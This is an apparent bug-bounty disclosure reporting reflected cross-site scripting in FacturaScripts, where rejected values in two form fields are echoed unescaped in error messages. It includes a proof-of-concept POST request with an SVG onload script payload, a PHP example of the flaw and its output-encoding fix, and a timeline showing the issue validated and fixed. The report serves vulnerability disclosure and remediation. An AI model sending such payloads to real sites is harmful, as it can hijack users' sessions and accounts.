Cross-site scripting - Reflected XSS caused by error logs in neorazorx/facturascripts

Valid

Reported on

Jun 4th 2022


Description

Two input fields have their rejected values reflected, unescaped, in the error log, which allows an XSS payload to be injected through that log:

  1. http://127.0.0.1/facturascripts/EditBalance, the codbalance field
  2. http://127.0.0.1/facturascripts/EditSettings, the tipoidfiscal field in Fiscal Id

Both fields accept only 1 to 25 letters or digits, with no spaces, accents or any other character, so the payload cannot be stored. The rejected value is, however, echoed back in the error log, so a reflected XSS can still be triggered.

Proof of Concept

POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"

edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"

EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"

CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"

61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"

CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"


------WebKitFormBoundaryYIfWjQXpEB2jLexN--
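The validation-versus-reflection gap described above, as an added example that is not FacturaScripts code: the same 1-25 letters-or-digits rule, an error message that echoes the rejected value verbatim (the vulnerable pattern), and the same message with HTML output encoding. Function names, the message wording and the field-name parameter are hypothetical.

```php
<?php
// Added example, not taken from FacturaScripts. Names below are hypothetical.

// The rule the report describes: 1 to 25 letters or digits, nothing else.
const FIELD_PATTERN = '/^[A-Za-z0-9]{1,25}$/';

function isValidCode(string $value): bool
{
    return preg_match(FIELD_PATTERN, $value) === 1;
}

// Vulnerable pattern: the value that failed validation is interpolated into
// HTML as-is. Validation prevents storage, but does nothing for reflection.
function errorHtmlUnsafe(string $field, string $value): string
{
    return "<div class=\"alert\">Invalid value for {$field}: {$value}</div>";
}

// Hardened pattern: HTML-encode every untrusted value at the point where it
// is written into markup, regardless of whether it passed validation.
function errorHtmlSafe(string $field, string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<div class=\"alert\">Invalid value for {$field}: {$safe}</div>";
}

// Constructed input: the value sent in the tipoidfiscal field of the PoC above.
$payload = "CI<svg/onload='alert(/xss/);'>";

// '<', '/' and the quotes are neither letters nor digits, so the value is
// rejected and the code path that renders the error message is taken.
if (!isValidCode($payload)) {
    // In the unsafe variant the <svg> tag reaches the browser intact.
    echo errorHtmlUnsafe('tipoidfiscal', $payload), PHP_EOL;
    // In the safe variant the angle brackets and quotes arrive as entities.
    echo errorHtmlSafe('tipoidfiscal', $payload), PHP_EOL;
}
```

Encoding at output time is the control that matters here: the input check alone only decides whether the value is stored, not how it is displayed.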

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago
i0hex modified the report
a year ago
i0hex modified the report
a year ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago
i0hex modified the report
a year ago
Carlos Garcia validated this vulnerability a year ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia marked this as fixed in 2022.1 with commit 7b4ddb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
i0hex
a year ago

Researcher

@admin Can you assign CVE?

Jamie Slome
a year ago

Admin

Sorted 👍
